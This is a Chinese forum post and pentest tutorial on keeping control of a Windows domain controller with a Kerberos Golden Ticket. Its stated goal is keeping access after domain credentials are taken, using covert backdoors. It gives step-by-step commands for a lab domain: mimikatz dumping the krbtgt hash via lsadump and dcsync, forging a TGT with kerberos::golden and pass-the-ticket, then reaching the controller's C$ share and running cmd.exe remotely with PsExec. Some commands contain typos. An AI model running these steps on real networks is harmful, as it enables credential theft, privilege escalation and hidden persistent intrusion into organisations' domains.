域控权限维持(上)

zhaorong · 发表于网络安全 2021-3-31 16:20:18


	域控权限维持(上) 在我们取得域控账号密码后，防止密码被改失去权限会使用隐蔽后门一系列手段来维持我们取得的域控权限。把恶意文件放在Windows启动项目录中是最简单的方式，但是隐蔽性差，较主流的域控权限维持方法通常有三种，本篇讲第一种Golden Ticket。 Golden Ticket Golden Ticket(黄金票据) ，黄金票据是伪造票据授予票据（TGT），也被称为认证票据。mimikatz 工具把GoldenTicket的这种特性称为“万能票据”。 Krbtgt账号用来创建票据授予服务加密的密钥,该账号在创建域控制器时由系统自动创建,并且其密码随机分配。 Kerberos黄金票据是有效的TGT Kerberos票据，因为它是由域Kerberos帐户（KRBTGT）加密和签名的。 TGT仅用于向域控制器上的KDC服务证明用户已被其他域控制器认证。TGT被KRBTGT密码散列加密并且可以被域中的任何KDC服务解密的。利用krbtgt用户和Hash伪造票据授予票据(TGT),冒充任意用户身份无限制地访问整个域中的机器且还可以提升为域管理员。黄金票据的条件要求： 1.域名称[AD PowerShell模块：（Get-ADDomain）.DNSRoot] 2.域的SID 值[AD PowerShell模块：（Get-ADDomain）.DomainSID.Value] 3.域的KRBTGT账户NTLM密码哈希 4.伪造用户名接下来,我们对Golden Ticket进行利用测试。这里域控制器为 Server 2008 R2 Sp1 192.168.239.138 dc.pentestlab.com, 域内主机为Server 2008 R2 192.168.239.133 zhangsan-pc.pentestlab.com。具体步骤如下。 1.域管理 net group "domain admins" /domain 复制代码查找域管理员执行效果如下 2.域SID 执行 whoami /user 命令，删除结果中SID的最后部分，获取域SID得到的效果如下。如果我们有PsTools,那么也可以使用PsGetsid.exe获取SID。 3.NTLM Hash 获取krbtgt账户的NTLM Hash需要拥有访问域控制器的权限。使用交互方式或远程方式登录域控制器后使用mimikatz来提取krbtgt账户的NTLM Hash,命令如下: privilege::debug mimikatz # lsadump::1sa /inject /name:krbtgt 复制代码或者 mimikatz # 1sadump::dcsync /domain.pentestlab.com /user:krbtgt 复制代码获取krbtgt账户信息执行效果如下。 4.Pass-the-Ticket攻击伪造Golden Ticket进行Pass-the-Ticket攻击，伪造项主要包括以下3个。 1.Domain:pentestlab.com 2.SID:S-1-5-21-2540170591-2917293557-2322194170 3.Hash:d1dd822b253f64cba7163e0509219d33 复制代码生成需要模拟用户的票据。以模拟域管理admin用户为例,执行的命令如下: mimikatz # kerberos::golden /user:admin /domain:pentestlab.com /sid:S-1-5-21-2540170591-2917293557-23 22194170 /krbtgt:d1dd822b253f64cba7163e0509219d33 /admin:admin.tck /ptt 复制代码生成admin用户的票据，执行效果如下。 5.验证成功测试获得的域管理权限,相关命令如下: dir \\dc.pentestlab.com\c$ P*ec.exe \\dc.pentestlab.com\ cmd.exe 复制代码* 访问C盘目录文件，执行效果分别如下。以域管理权限执行cmd.exe，执行效果分别如下。

微信扫一扫 分享朋友圈

域控权限维持(上)

微信扫一扫分享朋友圈